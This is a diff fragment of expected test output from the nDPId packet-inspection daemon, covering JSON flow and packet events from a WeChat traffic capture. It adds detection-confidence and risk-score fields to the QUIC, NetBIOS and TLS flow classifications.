-00727{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":999,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167650348,"flow_last_seen":1492167650348,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1492167650348,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.67","src_port":35601,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"ssl.gstatic.com","user_agent":"Chrome\/57.0.2987.133 Linux x86_64"}}
+00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":999,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167650348,"flow_last_seen":1492167650348,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1492167650348,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.67","src_port":35601,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"ssl.gstatic.com","user_agent":"Chrome\/57.0.2987.133 Linux x86_64"}}
 00915{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1000,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1492167650348,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":400,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":400,"pkt_l4_len":366,"ts_msec":1492167650348,"pkt":"8IQvSpdgeJKcD6iOCABFAAGCbiZAAEARRRnAqAFnrNkXQ4sRAbsBbnP9DSoBZwIONIO7UTAzNQLoUPe6\/kTOTlflPotTtybyc+JAmHNEvZwUaT+Y9MqSJDNXVlUHwBVN0wAQzobHU4rvOkVihYNG2ScjXRicw6QFTtMMe25DwzQ7F0UKP\/Y\/8HMbQmw9b+v7cjBNs8yLamuYyeUaQ6lA73AshAIuQPhL6IslIuIHWs+l0MLo2wd57CZSUFbeEQQGDWtD8b5mwEuaZ88hm8yA3WeZQ9Zu4UUro5Belh+M9DB8RCMbVDEQZk6oJR+FSwF3TriZCorpIzSRESc2crvu7FP1Tb9g0NyoL87e9cFlDFVypNQfdhNO+iEyVuMUtOGb6OQn1vrWvB\/icrLc4DopKhApNyBIG\/+MQmYuPalP+mCA4FXxaPeMi1RdjyuuqxJb39HK+6wmJsCzWDR6cvDTk6ywHmETP0AOjEu+QTifJk6chcMbgKmp0ErfBPvocLYD7Yj8Qw2lL48a1tEWZIz4lw=="}
 02257{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1001,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1492167650401,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1492167650401,"pkt":"eJKcD6iO8IQvSpdgCABFoAViAABAADcRt7+s2RdDwKgBZwG7ixEFTkCsBPCmO80d\/CW5IJoqjbn6lzjr5TC1v3d2foeU3jLNcA4IAV35th92JTinR3E92La4uW3lsByHG3R1axVDDHGrIc2Dhs2S+7aBzkyVbwcuUK77hYdmfJ4TJuEFhTaYjceo9r51oYeJqOHOCc1BBmB5E+A58P\/H55fRg4dxRA9v1f2aVQ6I67HK4M7mS7147fzZ170E12rNhRLBsPAWwZ8U93ZWKjAcVK9waq7ihKZ\/GTyfNPuOCQnhcxCFRMVEx2xx65NSFauaw3a1qVgRV428j6Bchcyom0cvPgxBbWJUmObxkeqmQAFmTPCN6igcJnamWF5CRIXtlRtvIVi8G3Rds0EdWXNYvxaTSkwCziFaIH6mAaz9hCwjxATLUAdqd1Yo+wN5ikpGmpiBzh3Coj125lb7YXMKgdIF\/8K12iKaeICQ1ArpMEt9vvWxk35P363XmPN9SjUjvFqh8rl+ETiuGHzQwTYDZUwFRT8Tnc90FuuWkSHrjLuI78eE0u2MPArYDWbkXnAkM9f\/B1mpEGpwrQCQA0PHuwaHNDaEcqfk+htDhYfF2k76y25VNuFHeOfHnAe8W\/L6MSq0NvvJdxpclRqAM5S2hcBrDwho6FgiBa0XuPrQx61q\/3nmcTSWb0DXXos+FWaLGj1Jg4cyk4xSeKoZfxTTY8qOxPxWcSNcXXGMVMwz3NtJzwB28A6uPq8NBF+APnNiUzkLELf20sskbghw4Wvw2P5GvZ6Z0iUqrAzGSGc0IroovL34w3TMmjBnTPzAWKnwYJxIrcFH65r\/43AXULA7mwVKw7TuryWaAn8PVofDMn5VL+m8Bc4anaE3270Gx7DXXa3CWGylYl6IhspD51Ji7UqD6pJpDanmkxF7QRS0mZz7M+VCAuE5+TvKpba5WKwmCrXKMkHXnBfHSx4yC\/BngUmyj5AqU\/35FBtHK2MhZhT3uv3ixGib\/DhROgxNj\/fCIDmyLmZy6LuI15IWBQr2uiGWD15jLW9srpQ3r\/cpXrjFWrIOILP7BDqFX16AVMtIyhn8QUmpyMBzWR3rPBVnAwwCQUSi7lOuHYSBa2JAApapl8ibPeq+IESORJ2WC1jpiGlKVsyKHvCUxM4DB9CDGl+VMCLfBwTUsv9jC9A0oISxfI+skno\/pMiMhfE+1+tVpq0kVbytQk5I14sgZgoXLliJYkFCOr3ikDyMImPkBDegikF\/nhKUricS6KkRKOBVEDYofUgm6hebzs7TAwbIX0LHGrieMSNYdiZ\/RaP9BKZ7WUS7z8Jvlw3DtdXYHHGY\/9m62j8jgUA89FYp2sdoaRFheoQUmxEE6EpSZHWMo5+AT1rvxDTcNLYyAF\/NKlyP79gaAWae04vlwFQ4Bupkoby3AV8qNrlb42pc54gLBwr2\/V8SfP1Jf8GHKLnbnMMGzz8c8g08IQe\/1e7EH9oyogw0WeUU2ddyxaRPwa4eLAdObHTP\/jn7fsHAYVorRI56TLQ62d12KS2GZw3\/dElBm43NGOyNU1Hp381LUrTlDOWD2CkkP1QCRN+zezQnIAdftR9GtZfdliGgi4n+DRQuugUUjAENUiyLbjua9o3CfXKyGh5RlHt3r219Xp7bzpU2Sa3x2tOlotON5hkk2pmORaeO3NrbIHwpGOzFl20\/4Mhk6xhdUZeHJoEN7V1+kqNLH9CANDu7wpMSMlhqJfpnckBvaCh9BXX3VOJErUyDwJ\/yEG1ZNKGdvcDhAfCDrZsIbxElU8wBdoFg5g3GjSgWUZyHIUdESjz3nA05zyGh0UQ5UNTBZNmAzAGEZvPJPDUf"}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1009,"source":"wechat.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1492167654504,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1492167654504,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0DsBAAEAGBoXAqAFny82XotNaAbub+DW+SvgsEIARAOUK7AAAAQEICgAx4GBFrgFX"}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1022,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167669545,"flow_last_seen":1492167669545,"flow_idle_time":180000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":0,"ts_msec":1492167669545,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00724{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1022,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1492167669545,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":254,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":254,"pkt_l4_len":220,"ts_msec":1492167669545,"pkt":"\/\/\/\/\/\/\/\/0CeIF3AECABFoADwPUUAAIARd2TAqAFkwKgB\/wCKAIoA3H9oEQ7+\/cCoAWQAigDGAAAgRUhFSkVQRkdFQkVPRU9FSkNORkFFRENBQ0FDQUNBQUEAIEFCQUNGUEZQRU5GREVDRkNFUEZIRkRFRkZQRlBBQ0FCAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAALAAAAAAAAAAAAOgDAAAAAAAAAAAsAFYAAwABAAEAAgA9AFxNQUlMU0xPVFxCUk9XU0UADACguw0AV09SS0dST1VQAAAAAAAAAAMKABAAgP4HAABHSU9WQU5OSS1QQwA="}
-00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1022,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167669545,"flow_last_seen":1492167669545,"flow_idle_time":180000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":0,"ts_msec":1492167669545,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
+00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1022,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167669545,"flow_last_seen":1492167669545,"flow_idle_time":180000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":0,"ts_msec":1492167669545,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
 00439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1031,"source":"wechat.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1492167690433,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":50,"pkt_l4_len":12,"ts_msec":1492167690433,"pkt":"AQBeAAAB8IQvSpdgCABGoAAkj9oAAAEC8bHAqAH+4AAAAZQEAAARZOybAAAAAAIAAAA="}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1045,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167695237,"flow_last_seen":1492167695237,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1492167695237,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54117,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1045,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1492167695237,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167695237,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8M9xAAEAG4WDAqAFny82XotNlAbtEgzv7AAAAAKACchBSeAAAAgQFtAQCCAoAMggnAAAAAAEDAwc="}
@@ -320,14 +320,14 @@
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1046,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1492167695488,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167695488,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8xuRAAEAGTljAqAFny82XotNmAbsIrs6CAAAAAKACchD7hQAAAgQFtAQCCAoAMghmAAAAAAEDAwc="}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1051,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1492167695562,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167695562,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG702WgJJlmRIM7\/KASN8ga\/wAAAgQFoAQCCApF0vJmADIIJwEDAwc="}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1052,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":3,"flow_last_seen":1492167695562,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1492167695562,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0M91AAEAG4WfAqAFny82XotNlAbtEgzv8oCSZZ4AQAOWASQAAAQEICgAyCHhF0vJm"}
-00811{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1053,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167695237,"flow_last_seen":1492167695562,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1492167695562,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54117,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00837{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1053,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167695237,"flow_last_seen":1492167695562,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1492167695562,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54117,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1054,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1492167695854,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167695854,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG702aaLHzgCK7Og6ASN8jmSwAAAgQFoAQCCApF0vKlADIIZgEDAwc="}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1055,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1492167695854,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1492167695854,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0xuVAAEAGTl\/AqAFny82XotNmAbsIrs6Dmix84YAQAOVLjAAAAQEICgAyCMFF0vKl"}
-00868{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1057,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167695237,"flow_last_seen":1492167695891,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":1492167695891,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54117,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
-01402{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1059,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167695237,"flow_last_seen":1492167695891,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"ts_msec":1492167695891,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54117,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}}
-00811{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1070,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167695488,"flow_last_seen":1492167696636,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1492167696636,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54118,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-00868{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1077,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167695488,"flow_last_seen":1492167697005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":1492167697005,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54118,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
-01402{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1079,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167695488,"flow_last_seen":1492167697006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"ts_msec":1492167697006,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54118,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}}
+00894{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1057,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167695237,"flow_last_seen":1492167695891,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":1492167695891,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54117,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+01428{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1059,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167695237,"flow_last_seen":1492167695891,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"ts_msec":1492167695891,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54117,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}}
+00837{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1070,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167695488,"flow_last_seen":1492167696636,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1492167696636,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00894{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1077,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167695488,"flow_last_seen":1492167697005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":1492167697005,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+01428{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1079,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167695488,"flow_last_seen":1492167697006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"ts_msec":1492167697006,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}}
